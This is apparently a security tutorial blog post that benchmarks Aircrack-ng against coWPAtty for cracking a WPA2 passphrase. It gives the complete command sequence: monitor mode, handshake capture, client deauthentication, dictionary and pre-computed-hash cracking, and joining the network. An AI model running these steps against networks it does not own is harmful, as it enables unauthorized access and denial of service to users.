Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.

It shows 4 different cracks, the time taken and speed of the crack (see results):

  • Aircrack-ng (Dictionary)
  • Aircrack-ng & airolib-ng (Pre-computed hashes)
  • coWPAtty (Dictionary)
  • coWPAtty & Genpmk (Pre-computed hashes)

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/WPA2-Aircrack-ng_vs_Cowpatty.mp4

Method

To crack WPA/WPA2 PSK you need to capture a 'Handshake' . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).

Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.

From here, the attacker can use that key to decrypt the captured data from before, and now is able to 'read' it as well as join the network.

If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.

You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)

Results

Software Time (Seconds) Keys Per Second Pre Calculate Time (Seconds)
AirCrack-ng 256.2 652.94 0
AirCrack-ng & Airolib-ng 2 65685.4 1162.2
Cowpatty 787.71 205.35 0
Cowpatty & Genpmk 1.25 129715.92 1228.06
AirCrack-ng & Airolib-ng 1164.2 65685.4 1162.2
Cowpatty & Genpmk 1229.31 129715.92 1228.06
  • The dictionary had 311141 lines (3.33M (3,499,543 bytes))
  • The WPA key on line: 202762.
  • Therefore it had to test 65.1% of the dictionary.

Aircrack-ng is better with dictionary attack, whereas coWPAtty & Genpmk is better with Pre-computed hashes (also takes longer to calculate them!)

Tools

  • Aircrack-ng suite
  • WiFi card that supports monitor mode
  • Big dictionary
  • Processing power

Software

Name: Aircrack-ng

Version: 1.0-rc3

Home Page: http://www.aircrack-ng.org/doku.php

Download Link: ~hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz`

Name: coWPAtty

Version: 4.3

Home Page: hxxp://www.willhackforsushi.com/Cowpatty.html (new: http://www.willhackforsushi.com/?page_id=50

Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt


airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap


cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt


genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash


wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1

Notes

  • Re-recorded the video

Song: Hi Friend (Original) - Deadmau5

Video length: 05:37

Capture length: 01:14:29

Blog Post: https://blog.g0tmi1k.com/2010/02/cracking-wifi-wpawpa2-aircrack-ng/